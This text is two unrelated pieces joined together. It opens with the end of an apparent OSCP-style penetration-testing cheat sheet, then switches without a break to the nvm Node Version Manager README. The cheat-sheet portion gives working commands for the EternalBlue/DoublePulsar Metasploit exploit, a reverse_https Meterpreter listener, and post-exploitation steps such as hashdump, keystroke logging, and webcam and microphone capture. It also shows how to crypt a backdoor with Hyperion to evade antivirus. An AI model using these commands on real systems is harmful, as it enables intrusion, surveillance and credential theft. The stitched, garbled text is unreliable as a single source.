`https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit` 3. Move the exploit to `/usr/share/metasploit-framework/modules/exploits/windows/smb` or `~/.msf4/modules/exploits/windows/smb` 4. Start metasploit console * I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes. use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10 RHOST => 10.10.10.10 msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe PROCESSINJECT => spoolsv.exe msf exploit(eternalblue_doublepulsar) > run * Experimenting with Meterpreter * Get system information from Meterpreter Shell `sysinfo` * Get user id from Meterpreter Shell `getuid` * Search for a file `search -f *pass*.txt` * Upload a file `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec` * Download a file `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe` * Invoke a command shell from Meterpreter Shell `shell` * Exit the meterpreter shell `exit` * Metasploit Exploit Multi Handler * multi/handler to accept an incoming reverse_https_meterpreter payload use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST $ip set LPORT 443 exploit [*] Started HTTPS reverse handler on https://$ip:443/ * Building Your Own MSF Module * <div class="highlight highlight-source-shell"> <pre>mkdir -p <span class="pl-k">~</span>/.msf4/modules/exploits/linux/misc <span class="pl-c1">cd</span> <span class="pl-k">~</span>/.msf4/modules/exploits/linux/misc cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld<span class="pl-cce">\_</span>postfix.rb ./crossfire.rb nano crossfire.rb</pre> </div> * Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities) * `download` Download a file or directory `upload` Upload a file or directory `portfwd` Forward a local port to a remote service `route` View and modify the routing table `keyscan_start` Start capturing keystrokes `keyscan_stop` Stop capturing keystrokes `screenshot` Grab a screenshot of the interactive desktop `record_mic` Record audio from the default microphone for X seconds `webcam_snap` Take a snapshot from the specified webcam `getsystem` Attempt to elevate your privilege to that of local system. `hashdump` Dumps the contents of the SAM database * Meterpreter Post Exploitation Features * Create a Meterpreter background session `background` # [](#bypassing-antivirus-software)Bypassing Antivirus Software * Crypting Known Malware with Software Protectors * One such open source crypter, called Hyperion <div class="highlight highlight-source-shell"> <pre>cp /usr/share/windows-binaries/Hyperion-1.0.zip unzip Hyperion-1.0.zip <span class="pl-c1">cd</span> Hyperion-1.0/ i686-w64-mingw32-g++ Src/Crypter/<span class="pl-k">*</span>.cpp -o hyperion.exe cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll <span class="pl-c1">.</span> cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll <span class="pl-c1">.</span> wine hyperion.exe ../backdoor.exe ../crypted.exe</pre> </div>
<a href="https://github.com/nvm-sh/logos"> <picture> <source media="(prefers-color-scheme: dark)" srcset="https://raw.githubusercontent.com/nvm-sh/logos/HEAD/nvm-logo-white.svg" /> <img src="https://raw.githubusercontent.com/nvm-sh/logos/HEAD/nvm-logo-color.svg" height="50" alt="nvm project logo" /> </picture> </a> # Node Version Manager [![Build Status](https://app.travis-ci.com/nvm-sh/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.39.3-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/7360/badge)](https://bestpractices.coreinfrastructure.org/projects/7360) <!-- To update this table of contents, ensure you have run `npm install` then `npm run doctoc` --> <!-- START doctoc generated TOC please keep comment here to allow auto update --> <!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE --> ## Table of Contents - [Intro](#intro) - [About](#about) - [Installing and Updating](#installing-and-updating) - [Install & Update Script](#install--update-script) - [Additional Notes](#additional-notes) - [Troubleshooting on Linux](#troubleshooting-on-linux) - [Troubleshooting on macOS](#troubleshooting-on-macos) - [Ansible](#ansible) - [Verify Installation](#verify-installation) - [Important Notes](#important-notes) - [Git Install](#git-install) - [Manual Install](#manual-install) - [Manual Upgrade](#manual-upgrade) - [Usage](#usage) - [Long-term Support](#long-term-support) - [Migrating Global Packages While Installing](#migrating-global-packages-while-installing) - [Default Global Packages From File While Installing](#default-global-packages-from-file-while-installing) - [io.js](#iojs) - [System Version of Node](#system-version-of-node) - [Listing Versions](#listing-versions) - [Setting Custom Colors](#setting-custom-colors) - [Persisting custom colors](#persisting-custom-colors) - [Suppressing colorized output](#suppressing-colorized-output) - [Restoring PATH](#restoring-path) - [Set default node version](#set-default-node-version) - [Use a mirror of node binaries](#use-a-mirror-of-node-binaries) - [.nvmrc](#nvmrc) - [Deeper Shell Integration](#deeper-shell-integration) - [bash](#bash) - [Automatically call `nvm use`](#automatically-call-nvm-use) - [zsh](#zsh) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file) - [fish](#fish) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file-1) - [Running Tests](#running-tests) - [Environment variables](#environment-variables) - [Bash Completion](#bash-completion) - [Usage](#usage-1) - [Compatibility Issues](#compatibility-issues) - [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux) - [Alpine Linux 3.13+](#alpine-linux-313) - [Alpine Linux 3.5 - 3.12](#alpine-linux-35---312) - [Uninstalling / Removal](#uninstalling--removal) - [Manual Uninstall](#manual-uninstall) - [Docker For Development Environment](#docker-for-development-environment) - [Problems](#problems) - [macOS Troubleshooting](#macos-troubleshooting) - [WSL Troubleshooting](#wsl-troubleshooting) - [Maintainers](#maintainers) - [License](#license) - [Copyright notice](#copyright-notice) <!-- END doctoc generated TOC please keep comment here to allow auto update --> ## Intro `nvm` allows you to quickly install and use different versions of node via the command line. **Example:** ```sh $ nvm use 16 Now using node v16.9.1 (npm v7.21.1) $ node -v v16.9.1 $ nvm use 14 Now using node v14.18.0 (npm v6.14.15) $ node -v v14.18.0 $ nvm install 12 Now using node v12.22.6 (npm v6.14.5) $ node -v v12.22.6 ``` Simple as that! ## About nvm is a version manager for [node.js](https://nodejs.org/en/), designed to be installed per-user, and invoked per-shell. `nvm` works on any POSIX-compliant shell (sh, dash, ksh, zsh, bash), in particular on these platforms: unix, macOS, and [windows WSL](https://github.com/nvm-sh/nvm#important-notes). <a id="installation-and-update"></a> <a id="install-script"></a> ## Installing and Updating ### Install & Update Script To **install** or **update** nvm, you should run the [install script][2]. To do that, you may either download and run the script manually, or use the following cURL or Wget command: ```sh curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.3/install.sh | bash ``` ```sh wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.3/install.sh | bash ``` Running either of the above commands downloads a script and runs it. The script clones the nvm repository to `~/.nvm`, and attempts to add the source lines from the snippet below to the correct profile file (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`). <a id="profile_snippet"></a> ```sh export NVM_DIR="$([ -z "${XDG_CONFIG_HOME-}" ] && printf %s "${HOME}/.nvm" || printf %s "${XDG_CONFIG_HOME}/nvm")" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm ``` #### Additional Notes - If the environment variable `$XDG_CONFIG_HOME` is present, it will place the `nvm` files there.</sub> - You can add `--no-use` to the end of the above script (...`nvm.sh --no-use`) to postpone using `nvm` until you manually [`use`](#usage) it. - You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables. Eg: `curl ... | NVM_DIR="path/to/nvm"`. Ensure that the `NVM_DIR` does not contain a trailing slash. - The installer can use `git`, `curl`, or `wget` to download `nvm`, whichever is available. - You can instruct the installer to not edit your shell config (for example if you already get completions via a [zsh nvm plugin](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/nvm)) by setting `PROFILE=/dev/null` before running the `install.sh` script. Here's an example one-line command to do that: `PROFILE=/dev/null bash -c 'curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.3/install.sh | bash'` #### Troubleshooting on Linux On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type `command -v nvm`, simply close your current terminal, open a new terminal, and try verifying again. Alternatively, you can run the following commands for the different shells on the command line: *bash*: `source ~/.bashrc` *zsh*: `source ~/.zshrc` *ksh*: `. ~/.profile` These should pick up the `nvm` command. #### Troubleshooting on macOS Since OS X 10.9, `/usr/bin/git` has been preset by Xcode command line tools, which means we can't properly detect if Git is installed or not. You need to manually install the Xcode command line tools before running the install script, otherwise, it'll fail. (see [#1782](https://github.com/nvm-sh/nvm/issues/1782)) If you get `nvm: command not found` after running the install script, one of the following might be the reason: - Since macOS 10.15, the default shell is `zsh` and nvm will look for `.zshrc` to update, none is installed by default. Create one with `touch ~/.zshrc` and run the install script again. - If you use bash, the previous default shell, your system may not have `.bash_profile` or `.bashrc` files where the command is set up. Create one of them with `touch ~/.bash_profile` or `touch ~/.bashrc` and run the install script again. Then, run `. ~/.bash_profile` or `. ~/.bashrc` to pick up the `nvm` command. - You have previously used `bash`, but you have `zsh` installed. You need to manually add [these lines](#manual-install) to `~/.zshrc` and run `. ~/.zshrc`. - You might need to restart your terminal instance or run `. ~/.nvm/nvm.sh`. Restarting your terminal/opening a new tab/window, or running the source command will load the command and the new configuration. - If the above didn't help, you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry. If the above doesn't fix the problem, you may try the following: - If you use bash, it may be that your `.bash_profile` (or `~/.profile`) does not source your `~/.bashrc` properly. You could fix this by adding `source ~/<your_profile_file>` to it or follow the next step below. - Try adding [the snippet from the install section](#profile_snippet), that finds the correct nvm directory and loads nvm, to your usual profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`). - For more information about this issue and possible workarounds, please [refer here](https://github.com/nvm-sh/nvm/issues/576) **Note** For Macs with the M1 chip, node started offering **arm64** arch darwin packages since v16.0.0 and experimental **arm64** support when compiling from source since v14.17.0. If you are facing issues installing node using `nvm`, you may want to update to one of those versions or later. #### Ansible You can use a task: ```yaml - name: Install nvm ansible.builtin.shell: > curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.3/install.sh | bash args: creates: "{{ ansible_env.HOME }}/.nvm/nvm.sh" ``` ### Verify Installation To verify that nvm has been installed, do: ```sh command -v nvm ``` which should output `nvm` if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary. **Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type `command -v nvm`, simply close your current terminal, open a new terminal, and try verifying again. ### Important Notes If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work. **Note:** `nvm` also support Windows in some cases. It should work through WSL (Windows Subsystem for Linux) depending on the version of WSL. It should also work with [GitBash](https://gitforwindows.org/) (MSYS) or [Cygwin](https://cygwin.com). Otherwise, for Windows, a few alternatives exist, which are neither supported nor developed by us: - [nvm-windows](https://github.com/coreybutler/nvm-windows) - [nodist](https://github.com/marcelklehr/nodist) - [nvs](https://github.com/jasongin/nvs) **Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/nvm-sh/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us: - [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell - [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup - [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell - [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish - [fish-nvm](https://github.com/FabioAntunes/fish-nvm) - Wrapper around nvm for fish, delays sourcing nvm until it's actually used. **Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket: - [[#900] [Bug] nodejs on FreeBSD may need to be patched](https://github.com/nvm-sh/nvm/issues/900) - [nodejs/node#3716](https://github.com/nodejs/node/issues/3716) **Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that: - [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](https://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/) **Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that: - When using `nvm` you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt` - If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with `nvm`) - You can (but should not?) keep your previous "system" node install, but `nvm` will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*` Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue. **Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade. **Note:** Git versions before v1.7 may face a problem of cloning `nvm` source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article. ### Git Install If you have `git` installed (requires git v1.7.10+): 1. clone this repo in the root of your user profile - `cd ~/` from anywhere then `git clone https://github.com/nvm-sh/nvm.git .nvm` 1. `cd ~/.nvm` and check out the latest version with `git checkout v0.39.3` 1. activate `nvm` by sourcing it from your shell: `. ./nvm.sh` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion ``` ### Manual Install For a fully manual install, execute the following lines to first clone the `nvm` repository into `$HOME/.nvm`, and then load `nvm`: ```sh export NVM_DIR="$HOME/.nvm" && ( git clone https://github.com/nvm-sh/nvm.git "$NVM_DIR" cd "$NVM_DIR" git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)` ) && \. "$NVM_DIR/nvm.sh" ``` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion ``` ### Manual Upgrade For manual upgrade with `git` (requires git v1.7.10+): 1. change to the `$NVM_DIR` 1. pull down the latest changes 1. check out the latest version 1. activate the new version ```sh ( cd "$NVM_DIR" git fetch --tags origin git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)` ) && \. "$NVM_DIR/nvm.sh" ``` ## Usage To download, compile, and install the latest release of node, do this: ```sh nvm install node # "node" is an alias for the latest version ``` To install a specific version of node: ```sh nvm install 14.7.0 # or 16.3.0, 12.22.1, etc ``` The first version installed becomes the default. New shells will start with the default version of node (e.g., `nvm alias default`). You can list available versions using `ls-remote`: ```sh nvm ls-remote ``` And then in any new shell just use the installed version: ```sh nvm use node ``` Or you can just run it: ```sh nvm run node --version ``` Or, you can run any arbitrary command in a subshell with the desired version of node: ```sh nvm exec 4.2 node --version ``` You can also get the path to the executable to where it was installed: ```sh nvm which 12.22 ``` In place of a version pointer like "14.7" or "16.3" or "12.22.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc: - `node`: this installs the latest version of [`node`](https://nodejs.org/en/) - `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/) - `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`. - `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in SemVer, versions communicate breakage, not stability). ### Long-term Support Node has a [schedule](https://github.com/nodejs/Release#release-schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments: - `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon` - `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon` - `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon` - `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon` - `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon` - `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon` - `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon` Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported. To get the latest LTS version of node and migrate your existing installed packages, use ```sh nvm install 'lts/*' --reinstall-packages-from=current ``` ### Migrating Global Packages While Installing If you want to install a new version of Node.js and migrate npm packages from a previous version: ```sh nvm install node --reinstall-packages-from=node ``` This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one. You can also install and migrate npm packages from specific versions of Node like this: ```sh nvm install 6 --reinstall-packages-from=5 nvm install v4.2 --reinstall-packages-from=iojs ``` Note that reinstalling packages _explicitly does not update the npm version_ — this is to ensure that npm isn't accidentally upgraded to a broken version for the new node version. To update npm at the same time add the `--latest-npm` flag, like this: ```sh nvm install 'lts/*' --reinstall-packages-from=default --latest-npm ``` or, you can at any time run the following command to get the latest supported npm version on the current node version: ```sh nvm install-latest-npm ``` If you've already gotten an error to the effect of "npm does not support Node.js", you'll need to (1) revert to a previous node version (`nvm ls` & `nvm use <your latest _working_ version from the ls>`, (2) delete the newly created node version (`nvm uninstall <your _broken_ version of node from the ls>`), then (3) rerun your `nvm install` with the `--latest-npm` flag. ### Default Global Packages From File While Installing If you have a list of default packages you want installed every time you install a new version, we support that too -- just add the package names, one per line, to the file `$NVM_DIR/default-packages`. You can add anything npm would accept as a package argument on the command line. ```sh # $NVM_DIR/default-packages rimraf object-inspect@1.0.2 stevemao/left-pad ``` ### io.js If you want to install [io.js](https://github.com/iojs/io.js/): ```sh nvm install iojs ``` If you want to install a new version of io.js and migrate npm packages from a previous version: ```sh nvm install iojs --reinstall-packages-from=iojs ``` The same guidelines mentioned for migrating npm packages in node are applicable to io.js. ### System Version of Node If you want to use the system-installed version of node, you can use the special default alias "system": ```sh nvm use system nvm run system --version ``` ### Listing Versions If you want to see what versions are installed: ```sh nvm ls ``` If you want to see what versions are available to install: ```sh nvm ls-remote ``` ### Setting Custom Colors You can set five colors that will be used to display version and alias information. These colors replace the default colors. Initial colors are: g b y r e Color codes: r/R = red / bold red g/G = green / bold green b/B = blue / bold blue c/C = cyan / bold cyan m/M = magenta / bold magenta y/Y = yellow / bold yellow k/K = black / bold black e/W = light grey / white ```sh nvm set-colors rgBcm ``` #### Persisting custom colors If you want the custom colors to persist after terminating the shell, export the `NVM_COLORS` variable in your shell profile. For example, if you want to use cyan, magenta, green, bold red and bold yellow, add the following line: ```sh export NVM_COLORS='cmgRY' ``` #### Suppressing colorized output `nvm help (or -h or --help)`, `nvm ls`, `nvm ls-remote` and `nvm alias` usually produce colorized output. You can disable colors with the `--no-colors` option (or by setting the environment variable `TERM=dumb`): ```sh nvm ls --no-colors nvm help --no-colors TERM=dumb nvm ls ``` #### Restoring PATH To restore your PATH, you can deactivate it: ```sh nvm deactivate ``` #### Set default node version To set a default Node version to be used in any new shell, use the alias 'default': ```sh nvm alias default node ``` #### Use a mirror of node binaries To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`: ```sh export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install node NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2 ``` To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`: ```sh export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 ``` `nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions. ### .nvmrc You can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory). Afterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line. For example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory: ```sh $ echo "5.9" > .nvmrc $ echo "lts/*" > .nvmrc # to default to the latest LTS version $ echo "node" > .nvmrc # to default to the latest version ``` [NB these examples assume a POSIX-compliant shell version of `echo`. If you use a Windows `cmd` development environment, eg the `.nvmrc` file is used to configure a remote Linux deployment, then keep in mind the `"`s will be copied leading to an invalid file. Remove them.] Then when you run nvm: ```sh $ nvm use Found '/path/to/project/.nvmrc' with version <5.9> Now using node v5.9.1 (npm v3.7.3) ``` `nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized. The contents of a `.nvmrc` file **must** be the `<version>` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required. ### Deeper Shell Integration You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` maintainers. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new). You can also use [`nvshim`](https://github.com/iamogbz/nvshim) to shim the `node`, `npm`, and `npx` bins to automatically use the `nvm` config in the current directory. `nvshim` is **not** supported by the `nvm` maintainers. Please [report issues to the `nvshim` team](https://github.com/iamogbz/nvshim/issues/new). If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` maintainers. We are, however, accepting pull requests for more examples. #### bash ##### Automatically call `nvm use` Put the following at the end of your `$HOME/.bashrc`: ```bash cdnvm() { command cd "$@" || return $? nvm_path=$(nvm_find_up .nvmrc | tr -d '\n') # If there are no .nvmrc file, use the default nvm version if [[ ! $nvm_path = *[^[:space:]]* ]]; then declare default_version; default_version=$(nvm version default); # If there is no default version, set it to `node` # This will use the latest version on your machine if [[ $default_version == "N/A" ]]; then nvm alias default node; default_version=$(nvm version default); fi # If the current version is not the default version, set it to use the default version if [[ $(nvm current) != "$default_version" ]]; then nvm use default; fi elif [[ -s $nvm_path/.nvmrc && -r $nvm_path/.nvmrc ]]; then declare nvm_version nvm_version=$(<"$nvm_path"/.nvmrc) declare locally_resolved_nvm_version # `nvm ls` will check all locally-available versions # If there are multiple matching versions, take the latest one # Remove the `->` and `*` characters and spaces # `locally_resolved_nvm_version` will be `N/A` if no local versions are found locally_resolved_nvm_version=$(nvm ls --no-colors "$nvm_version" | tail -1 | tr -d '\->*' | tr -d '[:space:]') # If it is not already installed, install it # `nvm install` will implicitly use the newly-installed version if [[ "$locally_resolved_nvm_version" == "N/A" ]]; then nvm install "$nvm_version"; elif [[ $(nvm current) != "$locally_resolved_nvm_version" ]]; then nvm use "$nvm_version"; fi fi } alias cd='cdnvm' cdnvm "$PWD" || exit ``` This alias would search 'up' from your current directory in order to detect a `.nvmrc` file. If it finds it, it will switch to that version; if not, it will use the default version. #### zsh ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an `.nvmrc` file with a string telling nvm which node to `use`: ```zsh # place this after nvm initialization! autoload -U add-zsh-hook load-nvmrc() { local nvmrc_path nvmrc_path="$(nvm_find_nvmrc)" if [ -n "$nvmrc_path" ]; then local nvmrc_node_version nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")") if [ "$nvmrc_node_version" = "N/A" ]; then nvm install elif [ "$nvmrc_node_version" != "$(nvm version)" ]; then nvm use fi elif [ -n "$(PWD=$OLDPWD nvm_find_nvmrc)" ] && [ "$(nvm version)" != "$(nvm version default)" ]; then echo "Reverting to nvm default version" nvm use default fi } add-zsh-hook chpwd load-nvmrc load-nvmrc ``` #### fish ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file This requires that you have [bass](https://github.com/edc/bass) installed. ```fish # ~/.config/fish/functions/nvm.fish function nvm bass source ~/.nvm/nvm.sh --no-use ';' nvm $argv end # ~/.config/fish/functions/nvm_find_nvmrc.fish function nvm_find_nvmrc bass source ~/.nvm/nvm.sh --no-use ';' nvm_find_nvmrc end # ~/.config/fish/functions/load_nvm.fish function load_nvm --on-variable="PWD" set -l default_node_version (nvm version default) set -l node_version (nvm version) set -l nvmrc_path (nvm_find_nvmrc) if test -n "$nvmrc_path" set -l nvmrc_node_version (nvm version (cat $nvmrc_path)) if test "$nvmrc_node_version" = "N/A" nvm install (cat $nvmrc_path) else if test "$nvmrc_node_version" != "$node_version" nvm use $nvmrc_node_version end else if test "$node_version" != "$default_node_version" echo "Reverting to default Node version" nvm use default end end # ~/.config/fish/config.fish # You must call it on initialization or listening to directory switching won't work load_nvm > /dev/stderr ``` ## Running Tests Tests are written in [Urchin]. Install Urchin (and other dependencies) like so: npm install There are slow tests and fast tests. The slow tests do things like install node and check that the right versions are used. The fast tests fake this to test things like aliases and uninstalling. From the root of the nvm git repository, run the fast tests like this: npm run test/fast Run the slow tests like this: npm run test/slow Run all of the tests like this: npm test Nota bene: Avoid running nvm while the tests are running. ## Environment variables nvm exposes the following environment variables: - `NVM_DIR` - nvm's installation directory. - `NVM_BIN` - where node, npm, and global packages for the active version of node are installed. - `NVM_INC` - node's include file directory (useful for building C/C++ addons for node). - `NVM_CD_FLAGS` - used to maintain compatibility with zsh. - `NVM_RC_VERSION` - version from .nvmrc file if being used. Additionally, nvm modifies `PATH`, and, if present, `MANPATH` and `NODE_PATH` when changing versions. ## Bash Completion To activate, you need to source `bash_completion`: ```sh [[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion ``` Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`). ### Usage nvm: > `$ nvm` <kbd>Tab</kbd> ```sh alias deactivate install list-remote reinstall-packages uninstall version cache exec install-latest-npm ls run unload version-remote current help list ls-remote unalias use which ``` nvm alias: > `$ nvm alias` <kbd>Tab</kbd> ```sh default iojs lts/* lts/argon lts/boron lts/carbon lts/dubnium lts/erbium node stable unstable ``` > `$ nvm alias my_alias` <kbd>Tab</kbd> ```sh v10.22.0 v12.18.3 v14.8.0 ``` nvm use: > `$ nvm use` <kbd>Tab</kbd> ``` my_alias default v10.22.0 v12.18.3 v14.8.0 ``` nvm uninstall: > `$ nvm uninstall` <kbd>Tab</kbd> ``` my_alias default v10.22.0 v12.18.3 v14.8.0 ``` ## Compatibility Issues `nvm` will encounter some issues if you have some non-default settings set. (see [#606](https://github.com/creationix/nvm/issues/606)) The following are known to cause issues: Inside `~/.npmrc`: ```sh prefix='some/path' ``` Environment Variables: ```sh $NPM_CONFIG_PREFIX $PREFIX ``` Shell settings: ```sh set -e ``` ## Installing nvm on Alpine Linux In order to provide the best performance (and other optimizations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides these pre-compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al). Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [BusyBox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. BusyBox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that. There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally. If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell, depending on which version you are using: ### Alpine Linux 3.13+ ```sh apk add -U curl bash ca-certificates openssl ncurses coreutils python3 make gcc g++ libgcc linux-headers grep util-linux binutils findutils curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.3/install.sh | bash ``` ### Alpine Linux 3.5 - 3.12 ```sh apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux 